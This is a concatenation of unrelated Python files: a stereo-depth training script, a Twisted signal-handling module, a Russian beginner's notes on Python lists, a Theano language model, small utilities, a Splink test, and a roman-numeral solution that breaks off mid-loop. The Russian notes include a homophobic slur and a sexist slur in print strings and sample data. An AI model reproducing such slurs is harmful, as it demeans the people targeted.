help='batch size for testing (default: 4)')
parser.add_argument('--save_path', type=str, default='results/pretrained_anynet',
help='the path of saving checkpoints and log')
parser.add_argument('--resume', type=str, default='results/pretrained_anynet',
help='resume path')
parser.add_argument('--lr', type=float, default=5e-4,
help='learning rate')
parser.add_argument('--with_spn', action='store_true', help='with spn network or not')
parser.add_argument('--print_freq', type=int, default=5, help='print frequence')
parser.add_argument('--init_channels', type=int, default=1, help='initial channels for 2d feature extractor')
parser.add_argument('--nblocks', type=int, default=2, help='number of layers in each stage')
parser.add_argument('--channels_3d', type=int, default=4, help='number of initial channels of the 3d network')
parser.add_argument('--layers_3d', type=int, default=4, help='number of initial layers of the 3d network')
parser.add_argument('--growth_rate', type=int, nargs='+', default=[4,1,1], help='growth rate in the 3d network')
parser.add_argument('--spn_init_channels', type=int, default=8, help='initial channels for spnet')
args = parser.parse_args()
if args.datatype == 'kitti':
from dataloader import KITTILoader as DA
from dataloader import KITTIloader2015 as lt
args.datapath = 'kitti/training/'
elif args.datatype == 'carla':
from dataloader import CarlaLoader as DA
from dataloader import CarlaSplit as lt
args.datapath = '/data/cli/carla_0.9.6_data/'
def main():
global args
train_left_img, train_right_img, train_left_disp, test_left_img, test_right_img, test_left_disp = lt.dataloader(
args.datapath)
TrainImgLoader = torch.utils.data.DataLoader(
DA.myImageFloder(train_left_img, train_right_img, train_left_disp, True),
batch_size=args.train_bsize, shuffle=True, num_workers=4, drop_last=False)
TestImgLoader = torch.utils.data.DataLoader(
DA.myImageFloder(test_left_img, test_right_img, test_left_disp, False),
batch_size=args.test_bsize, shuffle=False, num_workers=4, drop_last=False)
if not os.path.isdir(args.save_path):
os.makedirs(args.save_path)
log = logger.setup_logger(args.save_path + '/training.log')
for key, value in sorted(vars(args).items()):
log.info(str(key) + ': ' + str(value))
model = models.anynet.AnyNet(args)
# pdb.set_trace()
model = nn.DataParallel(model).cuda()
optimizer = optim.Adam(model.parameters(), lr=args.lr, betas=(0.9, 0.999))
log.info('Number of model parameters: {}'.format(sum([p.data.nelement() for p in model.parameters()])))
args.start_epoch = 0
if args.resume:
if os.path.isfile(args.resume):
log.info("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
args.start_epoch = checkpoint['epoch']
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
log.info("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
log.info("=> no checkpoint found at '{}'".format(args.resume))
log.info("=> Will start from scratch.")
else:
log.info('Not Resume')
start_full_time = time.time()
for epoch in range(args.start_epoch, args.epochs):
log.info('This is {}-th epoch'.format(epoch))
train(TrainImgLoader, model, optimizer, log, epoch)
savefilename = args.save_path + '/checkpoint.tar'
torch.save({
'epoch': epoch,
'state_dict': model.state_dict(),
'optimizer': optimizer.state_dict(),
}, savefilename)
test(TestImgLoader, model, log)
log.info('full training time = {:.2f} Hours'.format((time.time() - start_full_time) / 3600))
def add_afm_hook(module):
"""Add hook to module to save average feature map to `module._afm`"""
def hook(module, input_, output):
if not hasattr(module, '_afm_k'):
module._afm_k = 0
module._afm = output
module._bytetype = 0
else:
module._afm_k += 1
k = module._afm_k
n = k + 1.
# if output.type() != 'torch.FloatTensor':
# module._bytetype += 1
# output = output.float()
module._afm = (k / n * module._afm) + (output / n)
module.register_forward_hook(hook)
def save_afm(module, dir='./'):
"""Saves `module._afm` to disk, in dir"""
path = "{}{}".format(dir, ".pth")
afm = module._afm.cpu()
torch.save(afm, path)
vis_afm(afm, dir)
def vis_afm_signed(fm, dir='./', colormap=cv2.COLORMAP_HOT, fname='out'):
os.makedirs(dir, exist_ok=True)
path = os.path.join(dir, "{}.jpg".format(fname))
fm = normalize_fm(fm, colormap)
cv2.imwrite(path, fm)
def vis_afm_negative(fm, dir='./', fname='out'):
channel_neg = np.maximum(0, -fm)
dir_neg = "{}{}".format(dir, "_neg")
vis_afm_signed(channel_neg, dir_neg, cv2.COLORMAP_OCEAN, fname)
def vis_afm_positive(fm, dir='./', fname='out'):
channel_pos = np.maximum(0, fm)
dir_pos = "{}{}".format(dir, "_pos")
vis_afm_signed(channel_pos, dir_pos, cv2.COLORMAP_HOT, fname)
def normalize_fm(fm, colormap):
fm /= fm.max()
fm *= 255
fm = fm.astype(np.uint8)
fm = cv2.applyColorMap(fm, colormap)
return fm
def vis_afm(afm, dir='./', vis_functions=(vis_afm_positive, vis_afm_negative)):
"""Saves `module._afm` to disk, in dir"""
for i, channel in enumerate(afm[0]):
channel = channel.data.numpy()
for function in vis_functions:
function(channel, dir, i)
def add_all_afm_hooks(net):
for layer in get_all_afm_layers(list(net.children())[0]):
add_afm_hook(layer)
# for m in net:
# if isinstance(m, nn.Conv2d):
# add_afm_hook(m)
def save_all_afm(net, dir='./'):
os.makedirs('output/vis', exist_ok=True)
for name, layer in enumerate(get_all_afm_layers(list(net.children())[0])):
try:
save_afm(layer, dir=os.path.join('output/vis', str(name)))
print(layer)
except cv2.error:
print('error')
print(layer)
def get_all_afm_layers(net):
"""Return generator for layers, pulling out all Conv2d and GroupNorm layers."""
if isinstance(net, torch.nn.Conv2d) or isinstance(net, torch.nn.BatchNorm2d):
yield net
elif len(list(net.children())) == 0:
# Some layer we don't care about for afm, e.g. Linear
return
else:
for c in net.children():
yield from get_all_afm_layers(c)
#for nbranches, s, stage in (
# (2, 2, net.stage2),
# (3, 3, net.stage3),
# (4, 4, net.stage4)):
# for b in range(nbranches):
# yield 'stg{}_br{}_convbn1'.format(s, b), \
# stage[0].branches[b][0].bn1
# yield 'stg{}_br{}_convbn2'.format(s, b), \
# stage[0].branches[b][0].bn2
# yield 'stg{}_br{}_conv1'.format(s, b), \
# stage[0].branches[b][0].conv1
# yield 'stg{}_br{}_conv2'.format(s, b), \
# stage[0].branches[b][0].conv2
# for m in net:
# if isinstance(m, nn.Conv2d):
# save_afm(m, dir=dir)
def train(dataloader, model, optimizer, log, epoch=0):
stages = 3 + args.with_spn
losses = [AverageMeter() for _ in range(stages)]
length_loader = len(dataloader)
model.train()
for batch_idx, (imgL, imgR, disp_L) in enumerate(dataloader):
imgL = imgL.float().cuda()
imgR = imgR.float().cuda()
disp_L = disp_L.float().cuda()
optimizer.zero_grad()
mask = disp_L < args.maxdisp
mask.detach_()
outputs = model(imgL, imgR)
outputs = [torch.squeeze(output, 1) for output in outputs]
loss = [args.loss_weights[x] * F.smooth_l1_loss(outputs[x][mask], disp_L[mask], size_average=True)
for x in range(stages)]
sum(loss).backward()
optimizer.step()
for idx in range(stages):
losses[idx].update(loss[idx].item()/args.loss_weights[idx])
if batch_idx % args.print_freq == 0:
info_str = ['Stage {} = {:.2f}({:.2f})'.format(x, losses[x].val, losses[x].avg) for x in range(stages)]
info_str = '\t'.join(info_str)
log.info('Epoch{} [{}/{}] {}'.format(
epoch, batch_idx, length_loader, info_str))
info_str = '\t'.join(['Stage {} = {:.2f}'.format(x, losses[x].avg) for x in range(stages)])
log.info('Average train loss = ' + info_str)
def test(dataloader, model, log):
stages = 3 + args.with_spn
EPEs = [AverageMeter() for _ in range(stages)]
length_loader = len(dataloader)
model.eval()
add_all_afm_hooks(model)
for batch_idx, (imgL, imgR, disp_L) in enumerate(dataloader):
start = time.time()
imgL = imgL.float().cuda()
imgR = imgR.float().cuda()
disp_L = disp_L.float().cuda()
mask = disp_L < args.maxdisp
with torch.no_grad():
outputs = model(imgL, imgR)
for x in range(stages):
if len(disp_L[mask]) == 0:
EPEs[x].update(0)
continue
output = torch.squeeze(outputs[x], 1)
# output = output[:, 4:, :]
# result = (np.array(output.cpu())[0]).astype(np.uint8)
# imageio.imwrite("result-id{}-stage{}.png".format(batch_idx, x), result)
# print("Mask matched")
EPEs[x].update((output[mask] - disp_L[mask]).abs().mean())
# gt = (np.array(disp_L[0])*255).astype(np.uint8)
# imageio.imwrite("gt-id{}.png".format(batch_idx), gt)
end = time.time()
# print(end-start)
info_str = '\t'.join(['Stage {} = {:.2f}({:.2f})'.format(x, EPEs[x].val, EPEs[x].avg) for x in range(stages)])
log.info('[{}/{}] {}'.format(
batch_idx, length_loader, info_str))
save_all_afm(model)
info_str = ', '.join(['Stage {}={:.2f}'.format(x, EPEs[x].avg) for x in range(stages)])
log.info('Average test EPE = ' + info_str)
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
if __name__ == '__main__':
main()
|
# -*- test-case-name: twisted.internet.test.test_sigchld -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
This module is used to integrate child process termination into a
reactor event loop. This is a challenging feature to provide because
most platforms indicate process termination via SIGCHLD and do not
provide a way to wait for that signal and arbitrary I/O events at the
same time. The naive implementation involves installing a Python
SIGCHLD handler; unfortunately this leads to other syscalls being
interrupted (whenever SIGCHLD is received) and failing with EINTR
(which almost no one is prepared to handle). This interruption can be
disabled via siginterrupt(2) (or one of the equivalent mechanisms);
however, if the SIGCHLD is delivered by the platform to a non-main
thread (not a common occurrence, but difficult to prove impossible),
the main thread (waiting on select() or another event notification
API) may not wake up leading to an arbitrary delay before the child
termination is noticed.
The basic solution to all these issues involves enabling SA_RESTART
(ie, disabling system call interruption) and registering a C signal
handler which writes a byte to a pipe. The other end of the pipe is
registered with the event loop, allowing it to wake up shortly after
SIGCHLD is received. See L{twisted.internet.posixbase._SIGCHLDWaker}
for the implementation of the event loop side of this solution. The
use of a pipe this way is known as the U{self-pipe
trick<http://cr.yp.to/docs/selfpipe.html>}.
From Python version 2.6, C{signal.siginterrupt} and C{signal.set_wakeup_fd}
provide the necessary C signal handler which writes to the pipe to be
registered with C{SA_RESTART}.
"""
from __future__ import division, absolute_import
import signal
def installHandler(fd):
"""
Install a signal handler which will write a byte to C{fd} when
I{SIGCHLD} is received.
This is implemented by installing a SIGCHLD handler that does nothing,
setting the I{SIGCHLD} handler as not allowed to interrupt system calls,
and using L{signal.set_wakeup_fd} to do the actual writing.
@param fd: The file descriptor to which to write when I{SIGCHLD} is
received.
@type fd: C{int}
"""
if fd == -1:
signal.signal(signal.SIGCHLD, signal.SIG_DFL)
else:
def noopSignalHandler(*args):
pass
signal.signal(signal.SIGCHLD, noopSignalHandler)
signal.siginterrupt(signal.SIGCHLD, False)
return signal.set_wakeup_fd(fd)
def isDefaultHandler():
"""
Determine whether the I{SIGCHLD} handler is the default or not.
"""
return signal.getsignal(signal.SIGCHLD) == signal.SIG_DFL
|
first_name = "Eric"
question = ", would you like to learn some Python today?"
print(first_name.upper() +question)
my_14 = 14
print("Мое л число " + str(my_14)) #str - приводит число к строковому виду, сначала пишется str(), а в скобках указывается переменная
#списки
#Называть списки во множественном числе cycleS
#имя переменной cycles = потом квадратные скобки, в которых перечисляется состав списка напр:
#cycles = ['trek', 'redline']
cycles = ['trek', 'redline', 'cannon']
print(cycles)
#обращение к элементам списка начинается с 0 print(cycles[0])
print(cycles[0])
print(cycles[0].title()) #добавление метода title (Вывод с большой буквы)
print(cycles[-1].upper()) #если запросить -1, то выведет последний элемент из списка-2 предпоследний (добавил методо Upper)
print("Мой первый велосипед был "+cycles[-1].upper()+".") #пример вытаскивания из списка и засовывания в сообщение
#изменение элемента в списке
motorcycles = ['honda', 'yamaha', 'suzuki']
print(motorcycles)
motorcycles[0] = 'yokohama' #перед переменной ставится номер элемента
print(motorcycles[0])
#добавление элемента в конец списка
motorcycles.append('ducatti')
print(motorcycles)
#построение списка добавлением
motorcycles = []
motorcycles.append('gnoy')
motorcycles.append('cherv')
print(motorcycles)
#вставка - асафка в список метод insert(0 - позиция,)
motorcycles = ['honda', 'suzuki', 'yoko']
motorcycles.insert(0, 'ducatti')
print(motorcycles)
#удаление из списка
del motorcycles[2]
print(motorcycles)
#удаление с дальнейшим использованием, метод pop - убирает, но не удаляет из списка элемент (последний)
motorcycles = ['honda', 'suzuki', 'ducatti']
motorcycles_popped = motorcycles.pop()
print(motorcycles)
print(motorcycles_popped)
#удаление по ЗНАЧЕНИЮ элемента
motorcycles = ['honda', 'suzuki', 'bmw']
motorcycles.remove('suzuki')
print(motorcycles)
#удаление по значение с использованием
motorcycles = ['honda', 'suzuki', 'bmw']
print(motorcycles[0].title())
too_expensive = 'bmw'
motorcycles.remove(too_expensive)
print("\nA " +too_expensive.title()+" для педиков")
#задание
gosti = ['masha', 'petya','klava','ivan']
print(gosti)
priglashenie = "Всем быстро собраться"
print(priglashenie+" " +gosti[0].title())
print(priglashenie+" " +gosti[1].title())
print(priglashenie+" " +gosti[2].title())
ne_prishla = 'ivan'
gosti.remove(ne_prishla)
print(gosti)
print(ne_prishla)
gosti.append('volodya')
print(gosti)
gosti.insert(0, 'begemot')
gosti.insert(3, 'shalava')
gosti.append('gnome')
print(gosti)
###Сортировка переменная.sort()
gosti.sort()
print(gosti)
###Обратная сортировка .sort(reverse=true)
gosti.sort(reverse=True)
print(gosti)
###Временная сортировка(БЕЗ ИЗМЕНЕНИЯ СПИСКА)
print(sorted(gosti,reverse=True))
###Метод len - для определения количества объестов в списке
print(len(gosti))
############Задание#############
strany = ['tunis', 'turciya', 'canada', 'belgiya', 'germaniya']
strany.sort()
print(strany)
|
"""
General class for a recurrent language model
"""
__docformat__ = 'restructedtext en'
__authors__ = ("Alessandro Sordoni, Iulian Vlad Serban")
__contact__ = "Alessandro Sordoni <sordonia@iro.umontreal>"
import theano
import theano.tensor as T
import numpy as np
import cPickle
import logging
import operator
logger = logging.getLogger(__name__)
from theano.sandbox.rng_mrg import MRG_RandomStreams
from theano.tensor.shared_randomstreams import RandomStreams
from collections import OrderedDict
from model import *
from utils import *
# Theano speed-up
theano.config.scan.allow_gc = False
#
def add_to_params(params, new_param):
params.append(new_param)
return new_param
class ComponentBase():
def __init__(self, state, rng, parent):
patience = state['patience']
self.rng = rng
self.trng = MRG_RandomStreams(max(self.rng.randint(2 ** 15), 1))
self.parent = parent
self.state = state
self.__dict__.update(state)
self.rec_activation = eval(self.rec_activation)
self.params = []
class LanguageModel(ComponentBase):
TRAINING = 0
EVALUATION = 1
SAMPLING = 2
BEAM_SEARCH = 3
def init_params(self):
###################
# RECURRENT WEIGHTS
###################
# Build word embeddings, which are shared throughout the model
if self.initialize_from_pretrained_word_embeddings:
# Load pretrained word embeddings from pickled file
logger.debug("Loading pretrained word embeddings")
pretrained_embeddings = cPickle.load(open(self.pretrained_word_embeddings_file, 'r'))
# Check all dimensions match from the pretrained embeddings
print 'pretrained_embeddings[0].shape', pretrained_embeddings[0].shape
assert(self.idim == pretrained_embeddings[0].shape[0])
assert(self.rankdim == pretrained_embeddings[0].shape[1])
assert(self.idim == pretrained_embeddings[1].shape[0])
assert(self.rankdim == pretrained_embeddings[1].shape[1])
self.W_emb_pretrained_mask = theano.shared(pretrained_embeddings[1].astype(numpy.float32), name='W_emb_mask')
self.W_emb = add_to_params(self.params, theano.shared(value=pretrained_embeddings[0].astype(numpy.float32), name='W_emb'))
else:
# Initialize word embeddings randomly
self.W_emb = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.idim, self.rankdim), name='W_emb'))
self.W_in = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.rankdim, self.qdim), name='W_in'))
self.W_hh = add_to_params(self.params, theano.shared(value=OrthogonalInit(self.rng, self.qdim, self.qdim), name='W_hh'))
self.b_hh = add_to_params(self.params, theano.shared(value=np.zeros((self.qdim,), dtype='float32'), name='b_hh'))
if self.step_type == "gated":
self.b_r = add_to_params(self.params, theano.shared(value=np.zeros((self.qdim,), dtype='float32'), name='b_r'))
self.b_z = add_to_params(self.params, theano.shared(value=np.zeros((self.qdim,), dtype='float32'), name='b_z'))
self.W_in_r = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.rankdim, self.qdim), name='W_in_r'))
self.W_in_z = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.rankdim, self.qdim), name='W_in_z'))
self.W_hh_r = add_to_params(self.params, theano.shared(value=OrthogonalInit(self.rng, self.qdim, self.qdim), name='W_hh_r'))
self.W_hh_z = add_to_params(self.params, theano.shared(value=OrthogonalInit(self.rng, self.qdim, self.qdim), name='W_hh_z'))
self.bd_out = add_to_params(self.params, theano.shared(value=np.zeros((self.idim,), dtype='float32'), name='bd_out'))
self.Wd_emb = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.idim, self.rankdim), name='Wd_emb'))
######################
# Output layer weights
######################
out_target_dim = self.qdim
if not self.maxout_out:
out_target_dim = self.rankdim
self.Wd_out = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.qdim, out_target_dim), name='Wd_out'))
# Set up deep output
if self.deep_out:
self.Wd_e_out = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.rankdim, out_target_dim), name='Wd_e_out'))
self.bd_e_out = add_to_params(self.params, theano.shared(value=np.zeros((out_target_dim,), dtype='float32'), name='bd_e_out'))
def plain_step(self, x_t, h_tm1):
#### Handle the bias from the document
h_t = T.dot(x_t, self.W_in) + T.dot(h_tm1, self.W_hh) + self.b_hh
h_t = self.rec_activation(h_t)
return h_t
def gated_step(self, x_t, h_tm1):
r_t = T.nnet.sigmoid(T.dot(x_t, self.W_in_r) + T.dot(h_tm1, self.W_hh_r) + self.b_r)
z_t = T.nnet.sigmoid(T.dot(x_t, self.W_in_z) + T.dot(h_tm1, self.W_hh_z) + self.b_z)
h_tilde = T.dot(x_t, self.W_in) + T.dot(r_t * h_tm1, self.W_hh) + self.b_hh
h_tilde = self.rec_activation(h_tilde)
h_t = (np.float32(1.0) - z_t) * h_tm1 + z_t * h_tilde
return h_t, r_t, z_t, h_tilde
def approx_embedder(self, x):
return self.W_emb[x]
def build_lm(self, x, y=None, mode=TRAINING, prev_h=None, step_num=None):
"""
x is the input sequence
y are the targets
mode is the evaluation or sampling mode
prev_h is used in the sampling mode
step_num is the step number of decoding
"""
one_step = False
# Check parameter consistency
if mode == LanguageModel.EVALUATION or mode == LanguageModel.TRAINING:
assert y
else:
assert not y
assert prev_h
one_step = True
# if x.ndim == 2 then
# x = (n_steps, batch_size)
if x.ndim == 2:
batch_size = x.shape[1]
# else x = (word_1, word_2, word_3, ...)
# or x = (last_word_1, last_word_2, last_word_3, ..)
# in this case batch_size is
else:
batch_size = 1
if not prev_h:
prev_h = T.alloc(np.float32(0.), batch_size, self.qdim)
xe = self.approx_embedder(x)
# Gated Encoder
if self.step_type == "gated":
f_enc = self.gated_step
o_enc_info = [prev_h, None, None, None]
else:
f_enc = self.plain_step
o_enc_info = [prev_h]
# Run through all the sentence (encode everything)
if not one_step:
_res, _ = theano.scan(f_enc,
sequences=[xe],\
outputs_info=o_enc_info)
# Make just one step further
else:
_res = f_enc(xe, prev_h)
h = _res[0]
# Store last h for further use
pre_activ = self.output_layer(h, xe)
# EVALUATION : Return target_probs
# target_probs.ndim == 3
outputs = self.output_softmax(pre_activ)
if mode == LanguageModel.EVALUATION:
target_probs = GrabProbs(outputs, y)
return target_probs, h, outputs
# BEAM_SEARCH : Return output (the softmax layer) + the new hidden states
elif mode == LanguageModel.BEAM_SEARCH:
return outputs, h
# SAMPLING : Return a vector of n_sample from the output layer
# + log probabilities + the new hidden states
elif mode == LanguageModel.SAMPLING:
if outputs.ndim == 1:
outputs = outputs.dimshuffle('x', 0)
sample = self.trng.multinomial(pvals=outputs, dtype='int64').argmax(axis=-1)
if outputs.ndim == 1:
sample = sample[0]
log_prob = -T.log(T.diag(outputs.T[sample]))
return sample, log_prob, h
def output_layer(self, h, x):
pre_activ = T.dot(h, self.Wd_out)
if self.deep_out:
pre_activ += T.dot(x, self.Wd_e_out) + self.bd_e_out
if self.maxout_out:
pre_activ = Maxout(2)(pre_activ)
return pre_activ
def output_softmax(self, pre_activ):
# returns a (timestep, bs, idim) matrix (huge)
return SoftMax(T.dot(pre_activ, self.Wd_emb.T) + self.bd_out)
def build_next_probs_predictor(self, x, prev_h, d=None):
return self.build_lm(x, d, mode=LanguageModel.BEAM_SEARCH, prev_h=prev_h)
def sampling_step(self, *args):
args = iter(args)
# Arguments that correspond to scan's "sequences" parameteter:
step_num = next(args)
assert step_num.ndim == 0
# Arguments that correspond to scan's "outputs" parameteter:
prev_word = next(args)
assert prev_word.ndim == 1
# skip the previous word log probability
log_prob = next(args)
assert log_prob.ndim == 1
prev_h = next(args)
assert prev_h.ndim == 2
# When we sample we shall recompute the lm for one step...
sample, log_prob, h = self.build_lm(prev_word, prev_h=prev_h, step_num=step_num, mode=LanguageModel.SAMPLING)
assert sample.ndim == 1
assert log_prob.ndim == 1
assert h.ndim == 2
return [sample, log_prob, h]
def build_sampler(self, n_samples, n_steps):
# For the naive sampler, the states are:
# 1) a vector [<s>] * n_samples to seed the sampling
# 2) a vector of [ 0. ] * n_samples for the log_probs
# 3) prev_h hidden layers
# TODO: This does not support the document bias
states = [T.alloc(np.int64(self.sos_sym), n_samples),
T.alloc(np.float32(0.), n_samples),
T.alloc(np.float32(0.), n_samples, self.qdim)]
outputs, updates = theano.scan(self.sampling_step,
outputs_info=states,
sequences=[T.arange(n_steps, dtype='int64')],
n_steps=n_steps,
name="sampler_scan")
# Return sample, log_probs and updates (for tnrg multinomial)
return (outputs[0], outputs[1]), updates
####
def __init__(self, state, rng, parent):
ComponentBase.__init__(self, state, rng, parent)
self.init_params()
class RecurrentLM(Model):
def indices_to_words(self, seq, stop_at_eos = True):
sen = []
for k in range(len(seq)):
sen.append(self.idx_to_str[seq[k]])
if (seq[k] == self.eos_sym) and stop_at_eos:
break
return ' '.join(sen)
def words_to_indices(self, seq):
sen = []
for k in range(len(seq)):
sen.append(self.str_to_idx.get(seq[k], self.unk_sym))
return sen
def compute_updates(self, training_cost, params):
updates = {}
grads = T.grad(training_cost, params)
grads = OrderedDict(zip(params, grads))
# Clip stuff
c = numpy.float32(self.cutoff)
clip_grads = []
norm_gs = T.sqrt(sum(T.sum(g ** 2) for p, g in grads.items()))
normalization = T.switch(T.ge(norm_gs, c), c / norm_gs, np.float32(1.))
notfinite = T.or_(T.isnan(norm_gs), T.isinf(norm_gs))
for p, g in grads.items():
clip_grads.append((p, T.switch(notfinite, numpy.float32(.1) * p, g * normalization)))
grads = OrderedDict(clip_grads)
if self.initialize_from_pretrained_word_embeddings and self.fix_pretrained_word_embeddings:
# Keep pretrained word embeddings fixed
logger.debug("Will use mask to fix pretrained word embeddings")
grads[self.language_model.W_emb] = grads[self.language_model.W_emb] * self.language_model.W_emb_pretrained_mask
else:
logger.debug("Will train all word embeddings")
if self.updater == 'adagrad':
updates = Adagrad(grads, self.lr)
elif self.updater == 'sgd':
raise Exception("Sgd not implemented!")
elif self.updater == 'adadelta':
updates = Adadelta(grads)
elif self.updater == 'rmsprop':
updates = RMSProp(grads, self.lr)
elif self.updater == 'adam':
updates = Adam(grads)
else:
raise Exception("Updater not understood!")
return updates
def build_train_function(self):
if not hasattr(self, 'train_fn'):
# Compile functions
logger.debug("Building train function")
model_updates = self.compute_updates(self.softmax_cost_acc / self.x_data.shape[1], self.params)
self.train_fn = theano.function(inputs=[self.x_data, self.x_max_length, self.x_cost_mask],
outputs=self.softmax_cost_acc, updates=model_updates, name="train_fn")
return self.train_fn
def build_eval_function(self):
if not hasattr(self, 'eval_fn'):
# Compile functions
logger.debug("Building evaluation function")
self.eval_fn = theano.function(inputs=[self.x_data, self.x_max_length, self.x_cost_mask],
outputs=[self.softmax_cost_acc, self.softmax_cost], name="eval_fn")
return self.eval_fn
def build_eval_misclassification_function(self):
if not hasattr(self, 'eval_misclass_fn'):
# Compile functions
logger.debug("Building misclassification evaluation function")
self.eval_misclass_fn = theano.function(inputs=[self.x_data, self.x_max_length, self.x_cost_mask],
outputs=[self.prediction_misclassification_acc, self.prediction_misclassification], name="eval_misclass_fn",
on_unused_input='ignore')
return self.eval_misclass_fn
def build_sampling_function(self):
if not hasattr(self, 'sample_fn'):
logger.debug("Building sampling function")
self.sample_fn = theano.function(inputs=[self.n_samples, self.n_steps], outputs=[self.sample, self.sample_log_prob], \
updates=self.sampling_updates, name="sample_fn")
return self.sample_fn
def build_next_probs_function(self):
if not hasattr(self, 'next_probs_fn'):
outputs, h = self.language_model.build_next_probs_predictor(self.beam_source, prev_h=self.beam_h)
self.next_probs_fn = theano.function(inputs=[self.beam_h, self.beam_source],
outputs=[outputs, h],
name="next_probs_fn")
return self.next_probs_fn
def build_encoder_function(self):
if not hasattr(self, 'encoder_fn'):
_, h, _ = self.language_model.build_lm(self.training_x, y=self.training_y, mode=LanguageModel.EVALUATION, prev_h=self.beam_h)
self.encoder_fn = theano.function(inputs=[self.x_data, self.x_max_length, self.beam_h], outputs=h, \
on_unused_input='warn', name="encoder_fn")
return self.encoder_fn
def __init__(self, rng, state):
Model.__init__(self)
# Compatibility towards older models
if not 'initialize_from_pretrained_word_embeddings' in state:
state['initialize_from_pretrained_word_embeddings'] = False
self.state = state
self.__dict__.update(state)
self.rng = rng
# Load dictionary
raw_dict = cPickle.load(open(self.dictionary, 'r'))
# Probabilities for each term in the corpus
self.str_to_idx = dict([(tok, tok_id) for tok, tok_id, _ in raw_dict])
self.idx_to_str = dict([(tok_id, tok) for tok, tok_id, freq in raw_dict])
# if '<s>' not in self.str_to_idx \
# or '</s>' not in self.str_to_idx:
# raise Exception("Error, malformed dictionary!")
# Number of words in the dictionary
self.idim = len(self.str_to_idx)
self.state['idim'] = self.idim
logger.debug("Initializing language model")
self.language_model = LanguageModel(self.state, self.rng, self)
# Init params
self.params = self.language_model.params
self.x_data = T.imatrix('x_data')
self.x_cost_mask = T.matrix('cost_mask')
self.x_max_length = T.iscalar('x_max_length')
# The training is done with a trick. We append a special </q> at the beginning of the session
# so that we can predict also the first query in the session starting from the session beginning token (</q>).
self.aug_x_data = T.concatenate([T.alloc(np.int32(self.eos_sym), 1, self.x_data.shape[1]), self.x_data])
self.training_x = self.aug_x_data[:self.x_max_length]
self.training_y = self.aug_x_data[1:self.x_max_length+1]
self.training_x_cost_mask = self.x_cost_mask[:self.x_max_length].flatten()
target_probs, self.eval_h, target_probs_full_matrix = self.language_model.build_lm(self.training_x,
y=self.training_y,
mode=LanguageModel.EVALUATION)
# Prediction cost
#self.prediction_cost = T.sum(-T.log(target_probs) * self.training_x_cost_mask)
self.softmax_cost = -T.log(target_probs) * self.training_x_cost_mask
self.softmax_cost_acc = T.sum(self.softmax_cost)
# Prediction accuracy
self.prediction_misclassification = T.neq(T.argmax(target_probs_full_matrix, axis=2), self.training_y).flatten() * self.training_x_cost_mask
self.prediction_misclassification_acc = T.sum(self.prediction_misclassification)
# Sampling variables
self.n_samples = T.iscalar("n_samples")
self.n_steps = T.iscalar("n_steps")
(self.sample, self.sample_log_prob), self.sampling_updates \
= self.language_model.build_sampler(self.n_samples, self.n_steps)
# Beam-search variables
self.beam_source = T.lvector("beam_source")
self.beam_h = T.matrix("beam_h")
self.beam_step_num = T.lscalar("beam_step_num")
|
from .log import set_verbosity # , set_repeat
from .opt import nn_opt
TOL = 1e-12
def set_tolerance(tol):
global TOL
TOL = tol
|
import os
import sys
class output(object):
"""
ANSI console colored output:
* error (red)
* warning (yellow)
* debug (green)
Set environment variable `COLOR_OUTPUT_VERBOSE' to enable debug
"""
RED = 1
GREEN = 2
YELLOW = 3
ERROR = 4
DEBUG = 5
WARNING = 6
SUCCESS = 7
@staticmethod
def __out(type, msg):
if type == output.ERROR:
sys.stderr.write("\033[%dm [%s] %s\033[m\n" %
(30 + output.RED, "Error", msg))
if type == output.DEBUG:
sys.stdout.write("\033[%dm [%s] %s\033[m\n" %
(30 + output.GREEN, "Debug", msg))
if type == output.WARNING:
sys.stdout.write("\033[%dm [%s] %s\033[m\n" %
(30 + output.YELLOW, "Warning", msg))
if type == output.SUCCESS:
sys.stdout.write("\033[%dm [%s] %s\033[m\n" %
(30 + output.GREEN, "Sucess", msg))
@staticmethod
def error(msg):
output.__out(output.ERROR, msg)
@staticmethod
def debug(msg):
if "COLOR_OUTPUT_VERBOSE" in os.environ:
output.__out(output.DEBUG, msg)
@staticmethod
def warning(msg):
output.__out(output.WARNING, msg)
@staticmethod
def success(msg):
output.__out(output.SUCCESS, msg)
def get_absolute_path(path):
p = os.path.expanduser(path)
return os.path.abspath(p)
|
import pytest
from pyspark.sql import Row
from splink import Splink
def test_nulls(spark):
settings = {
"link_type": "dedupe_only",
"proportion_of_matches": 0.1,
"comparison_columns": [
{
"col_name": "fname",
"m_probabilities": [0.4, 0.6],
"u_probabilities": [0.65, 0.35],
},
{
"col_name": "sname",
"m_probabilities": [0.25, 0.75],
"u_probabilities": [0.7, 0.3],
},
{
"col_name": "dob",
"m_probabilities": [0.4, 0.6],
"u_probabilities": [0.65, 0.35],
},
],
"blocking_rules": [],
}
rows = [
{"unique_id": 1, "fname": "Rob", "sname": "Jones", "dob": "1980-01-01"},
{"unique_id": 2, "fname": "Rob", "sname": "Jones", "dob": None},
{"unique_id": 3, "fname": "Rob", "sname": None, "dob": None},
{"unique_id": 4, "fname": None, "sname": None, "dob": None},
]
df = spark.createDataFrame(Row(**x) for x in rows)
linker = Splink(settings, df, spark)
df_e = linker.manually_apply_fellegi_sunter_weights()
df = df_e.toPandas()
result_list = list(df["match_probability"])
correct_list = [0.322580645, 0.16, 0.1, 0.16, 0.1, 0.1]
assert result_list == pytest.approx(correct_list)
|
#!/usr/bin/env python3
__author__ = 'Wei Mu'
class Solution:
def romanToInt(self, s):
"""
:type s: str
:rtype: int
"""
ans = 0
value = dict()
value['I'] = 1
value['V'] = 5
value['X'] = 10
value['L'] = 50
value['C'] = 100
value['D'] = 500
value['M'] = 1000
for ind, val in enumerate(s):
